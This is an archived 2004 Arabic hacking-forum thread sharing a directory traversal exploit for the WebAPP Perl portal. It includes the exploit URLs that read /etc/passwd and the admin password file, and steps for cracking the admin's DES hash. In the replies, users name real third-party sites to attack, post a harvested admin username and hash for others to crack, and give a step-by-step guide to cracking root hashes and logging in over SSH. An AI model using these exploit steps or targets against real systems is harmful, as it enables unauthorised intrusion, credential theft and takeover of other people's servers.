المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغره WebAPP


دعباس
26-08-2004, 01:21
السلام عليكم

تاريخ الصدور :Aug 25 2004

A vulnerability was reported in WebAPP. A remote user can view files on the target system that are located outside of the web document directory.


'index.cgi'



Jerome Athias reported that the 'index.cgi' script does not properly validate user-supplied input in the 'viewcat' variable. A remote user can supply a specially crafted URL containing '../' directory traversal characters to view files on the target system with the privileges of the web service.


A demonstration exploit URL is provided:

http://[target]/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd% 00



A remote user can exploit this flaw to view the 'db/members/admin.dat' file to obtain the administrator's hashed password. Individual user '.dat' files can also be obtained from the 'db/members/' directory.

Impact: A remote user can view files on the target system, including database files that contain hashed passwords for the application.


راجع المورد لحل الثغره

www.web-app.org
او نعطيك الحل
http://www.3asfh.net/vb/images/icons/icon10.gif



_ شرح تفصيلي من مكتشف الثغره

Date: 24 Aug 2004 15:42:51 -0000
From: "J r me" ATHIAS <jerome.athias@caramail.com>
Subject: WebAPP directory traversal and ability to retrieve the DES








WebAPP is advertised as the internet's most feature rich,
easy to run PERL based portal system.
Its home site is at http://www.web-app.org/
Some features are :

-Easy to Install on standard Unix servers!
(Windows user-supported only!)
-User Profiles
-Message forums
-Private messaging between members
-Blog-style News Articles
-Links and Downloads
-Customizable themes
-Multiple language support
-Flat-file System-NO SQL DATABASE!
-Membership controls
-Open source

Several user mods are also available which ranges from chat
to e-commerce applications.

Several vulnerabilities in these mods have already been
discovered.



The WebAPP system itself has a serious reverse directory
traversal vulnerability.

Example..

1) Go to http://vulnerable-target.xxx/cgi-bin/index.cgi
/this is their main support site/

2) Click on Articles on the main menu at the left side of
the screen

3) Click on any of the icons representing the misc topics
available /i chose the "bugs" section/

4) You'll wind up with the url "http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=bugs"
on the address bar on your browser. Change it to
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00"

5)View the html source for the page



A more interesting file to look at would be;
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00"

View the html source code and scroll down until you come to
the line with;
href="index.cgi?action=viewnews&amp;id=adUCOOzV2ljgg"></a></td>

"adUCOOzV2ljgg" is the hashed password of the Administrator.
It's standard DES encrypted so you can
run a password cracking program to crack it

Every user would have a corresponding .dat file within the
db/members directory


PhTeam Release

Greetz to PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps,
ch1m3ra, and sa mga posers na kupal sa #oneball




احب اقول للسكربت كيدز للينقل مواضيع وبدون اسم الكاتب ويحاول انه يختلق حزازيات بين الناس مالها داعي .. ترا راس مالك php ........قال linux قال http://www.3asfh.net/vb/images/icons/icon10.gif

على قوله بلاك هنتر .الله يذكره بالخير. اطفالنا اكبادنا http://www.3asfh.net/vb/images/icons/icon10.gif


اخوكم دعباس

:::: العاصفة :::::

دعباس
26-08-2004, 01:28
للتجربه

http://standesbeamte-mv.de


فمان الله

MaN~HaCkErZ
26-08-2004, 02:23
السلام عليكم
يسلمووووووووووووا دعباس على الثغره

وجاااري التجربه...

-------

بونوره
26-08-2004, 03:30
شكرا دعباس ...............................وجاري التجربه

maxhak2000
26-08-2004, 05:39
يعطيك العافية يادب على الثغرة

دعباس
26-08-2004, 05:48
هلا والله

الله يسلمك مان يسلمووووا

مشكور بو نوره لمرورك

ياهلا والله ماكس يالله حيوه http://www.flashyat.com/vb/images/icons/z3.gif


مشكورين

a7sas
26-08-2004, 11:41
وعليكم السلام ....

الــــــــــف شكر لك يا دعـباس ;)

تحياتي لك
a7sas

دعباس
26-08-2004, 11:49
الله يسلمك
احساس ,

وشكرا للرد :)

KuwaiTonly
26-08-2004, 02:00
ألف شكر خيو دعبووووس |2| |2| |2|

: )

Darkwar
26-08-2004, 02:11
شكرا على الثغره القويه تحياتي لك اخوى

دعباس
26-08-2004, 02:24
مشكورين ياشباب

وترقبوا المزيد بااذن الله

DaRk_AgE
26-08-2004, 04:20
مشاء الله ثغرة ولا اروع

لكن عندى سؤال

بعد ماتعمل
http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00"

بتظهر السورس صح
لو كلامى صحيح كيف بتعمل بعد الخطوة هذى يعنى انا جربت ومالقيت نتيجة اخى

منتظر الرد

DaRk_AgE

DaRk_AgE
26-08-2004, 04:26
يعنى انا مالقيت الكلام هذا

id=adUCOOzV2ljgg

منتظر الرد يالاخوان

DaRk_AgE

محب الدمار
26-08-2004, 04:28
يعطيك العافية دعبااااس ماقصرت:)

DaRk_AgE
26-08-2004, 04:58
وهذا موقع اسرائيلى


http://www.bdragon.host.up.co.il/cgi-bin/webapp/index.cgi?action=contact

وسويت التالى

http://www.bdragon.host.up.co.il/cgi-bin/webapp/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00

وبحثت فى السورس مالقيت شى

ثم سويت
http://www.bdragon.host.up.co.il/cgi-bin/webapp/index.cgi?action=topics&viewcat=../../db/members/admin.dat

ومالقيت شى وزدت بحثت فى السورس مالقيت الباسورد

وباعتقد انة منتدى اسرائيلى

منظر شوية اجوبة بخصوص النقطة هذى
************************************************** ****




وهذا واحد منتظر فك تشفيرة

http://home.astrakan.hig.se/binge/cgi-bin/webapp/cgi-bin/db/members/admin.dat

اليوزر adminstrator
والباسadd8vWeuFVDTY

واللى يفكة هنيئا لية بس الدخول للموقع راح يكون من البورت 2082 ولا ftp ولا منفد تانى

DaRk_AgE
************************************************** ************************************************** ****************

pppppp
26-08-2004, 05:06
by the name of allah
=======================
azay a7'osh 3alla el mwk3 ba3d ma afok el password 3an try2 el ftp walla eih

مملكة الهكر
26-08-2004, 05:21
مشكور اخي دعبوس على الثغره القويه زيك

Smart c0d3r
27-08-2004, 08:50
يسلمووووووو عمو دعباس
ثغرة حلوة وابداع منك يا دب :)
اي والله ذكرتني بالدب هذاك بلاك ... أطفالنا أكبادنا :d
الله يذكره بالخير :d

تحياتي

DaRk_AgE
28-08-2004, 06:30
يالاخوأن يعنى مارد عليا حدا

فى سوالى اللى طرحتة فى الصفحة الاولى

ياشباب منتظر شوية توضيحات

DaRk_AgE

دعباس
28-08-2004, 06:37
مشكورين لكل اللى ردو

والله ماقصرتوا ,,

صحيح اخوي بالسورس تطلع الباسورد ولكن حاول........ اول كنت ادخل مواقع السيكيورتي وتوصلني اخبار الثغرات بس ماعرف شئ

ولكن الحين الحمد لله تمام

حاول وحاول وابعد الملل ...,

a7sas
28-08-2004, 07:37
DaRk_AgE
،،،،،،،،،،،،،

لما تطلع ملف الـ passwd
بيكون بحالتين مخفي او انه مشفر

1- مخفي يعني
root:x:1:ssh
شوف لان الــ x موجوده مخفي .

2- مشفر يعني
root:GkUeu8AfVTEIA:id1:ssh
a-afford:GkUeu8AfVTEIA
abelisar:lOxG5JygiQk6Q
abtopnet:SH5y9FUEVfQCA
accesser:lxj3ie7KHTB1c
acrovers:hGZ2jfiMLANBg
activetu:9RKKdvmMksqcU
actlikee:9OrzYfc50aUSk
adoratio:OJ06dCwOyX85w
afroluvc:iWZu.5DPaxZvs
لاحظ ان الــ x مو موجود .

طبعا المشفر هو اللي نستفيد منه .

كيف نستفيد ؟
1- انسخ باسوورد الروت ان كنت تبي تصير رووت يعني الباسوورد اللي جذي :-
root:GkUeu8AfVTEIA:id1:ssh
انسخ الجز هذا
root:GkUeu8AfVTEIA:
وبعدها فك التشفير ، اذا انفك معك التشفير بقت عليك خطوه وحده

ادخل ابدا وبعدين تشغل
start & run
واكتب command
بعدها اكتب
ping www.xxxx.com
xxx = الموقع اللي طلعت منه الباسوورد.

بيطلع لك الايبي انسخ الايبي وشغل برنامج putty
حط مكان الــ host رقم الايبي ، والمنفذ منفذ الشيل 22
واعمل اتصال
بيطلب منك اليوزر والباسوورد
اكتب اليوزر
root
والباسوورد اللي طلع معك
اللحين انت روووت سو اللي تبيه .

*********************

<< ترى ما يدري شنو سؤالك :(
بس اني جاوبت كيف تستفيد من هالثغره باخذ الرووت

دعباس
28-08-2004, 10:38
الله ينور دربك اخوي a7sas

DaRk_AgE
28-08-2004, 03:34
الله ينور عليك اخى a7sas

على المعلومات اللى وضحتها بس هذا مابيتعلق بهذى الثغرة

بس وضحتلى بعض النواقص من شرحك

اما انت يا دعباس اخ منك اخ

ههههههه

ماعطيتنى اجابة طيب يادعباس حردهالك مرة تانية هههه

مشكورين على ردودكم اخوانى

سلامى

DaRk_AgE

foooooz
29-08-2004, 07:07
مشكور يا اخى على الثغرة وبارك الله فيك

سلفــ911ــر
29-08-2004, 05:59
http://www.3asfh.net/vb/images/icons/a9.gif وش الحركات هذي يا دعباس والله وصرت تشرح بالانجليزي عقبال الياباني انشاء الله http://www.3asfh.net/vb/images/icons/a18.gif